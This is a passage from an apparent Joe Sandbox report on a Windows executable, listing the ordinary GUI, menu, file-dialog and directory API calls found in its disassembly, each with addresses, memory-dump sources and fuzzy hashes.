                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll$IconLoad
                                                                                          • String ID: blank$info$question$stop$warning
                                                                                          • API String ID: 2485277191-404129466
                                                                                          • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                          • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                                          • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                                          • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                                          APIs
                                                                                          • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                                          • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                                          • strncnt.LIBCMT ref: 00428646
                                                                                          • strncnt.LIBCMT ref: 0042865A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: strncnt$CompareErrorLastString
                                                                                          • String ID:
                                                                                          • API String ID: 1776594460-0
                                                                                          • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                          • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                                          • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                                          • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                                          APIs
                                                                                          • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                          • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00454688
                                                                                          • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                                          • GetDesktopWindow.USER32 ref: 00454708
                                                                                          • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                          • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                          • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                          • String ID:
                                                                                          • API String ID: 3869813825-0
                                                                                          • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                          • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                          • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                          • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                          APIs
                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                          • GetCursorInfo.USER32 ref: 00458E03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Cursor$Load$Info
                                                                                          • String ID:
                                                                                          • API String ID: 2577412497-0
                                                                                          • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                          • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                          • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                          • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                          • GetFocus.USER32 ref: 004696E0
                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessagePost$CtrlFocus
                                                                                          • String ID: 0
                                                                                          • API String ID: 1534620443-4108050209
                                                                                          • Opcode ID: a7e7dd4ad94bd17b8779821b2562c3e74f4a4d43059232d4a161c8df91f382bc
                                                                                          • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                          • Opcode Fuzzy Hash: a7e7dd4ad94bd17b8779821b2562c3e74f4a4d43059232d4a161c8df91f382bc
                                                                                          • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00468107
                                                                                          • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                          • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                          • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                          • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                          • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                          • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                          • GetMenuItemCount.USER32 ref: 004682DC
                                                                                          • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                          • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                          • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                          • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 3993528054-4108050209
                                                                                          • Opcode ID: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                          • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                          • Opcode Fuzzy Hash: d5573be1ba1a613c106f8e764602a2d45d8b266f51cd1eb04f60dea375430468
                                                                                          • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                          APIs
                                                                                          • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                            • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                            • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                            • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                          • SendMessageW.USER32(?), ref: 0046F34C
                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                          • _wcscat.LIBCMT ref: 0046F3BC
                                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                          • DragFinish.SHELL32(?), ref: 0046F414
                                                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                          • API String ID: 4085615965-3440237614
                                                                                          • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                          • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                          • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                          • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll
                                                                                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                          • API String ID: 3832890014-4202584635
                                                                                          • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                          • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                          • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                          • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 004669C4
                                                                                          • _wcsncpy.LIBCMT ref: 00466A21
                                                                                          • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • _wcstok.LIBCMT ref: 00466A90
                                                                                            • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                          • _wcstok.LIBCMT ref: 00466B3F
                                                                                          • _wcscpy.LIBCMT ref: 00466BC8
                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                          • _wcslen.LIBCMT ref: 00466D1D
                                                                                          • _memset.LIBCMT ref: 00466BEE
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • _wcslen.LIBCMT ref: 00466D4B
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                          • String ID: X$HH
                                                                                          • API String ID: 3021350936-1944015008
                                                                                          • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                          • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                          • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                          • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0045F4AE
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                          • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoItemMenu$Sleep_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 1504565804-4108050209
                                                                                          • Opcode ID: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                          • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                          • Opcode Fuzzy Hash: b2eb264578549714347dca4c6cc1c63db220fd8d89572d1a81e0d1d82c6caf25
                                                                                          • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$CreateDestroy
                                                                                          • String ID: ,$tooltips_class32
                                                                                          • API String ID: 1109047481-3856767331
                                                                                          • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                          • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                          • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                          • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                          APIs
                                                                                          • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                          • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                          • _wcscat.LIBCMT ref: 0045CD51
                                                                                          • _wcscat.LIBCMT ref: 0045CD63
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                          • _wcscpy.LIBCMT ref: 0045CE14
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1153243558-438819550
                                                                                          • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                          • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                          • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                          • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00455127
                                                                                          • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                          • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                          • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                          • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                          • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                          • DrawMenuBar.USER32 ref: 00455207
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                          • String ID: 0
                                                                                          • API String ID: 1663942905-4108050209
                                                                                          • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                          • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                          • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                          • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                          • String ID:
                                                                                          • API String ID: 1481289235-0
                                                                                          • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                          • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
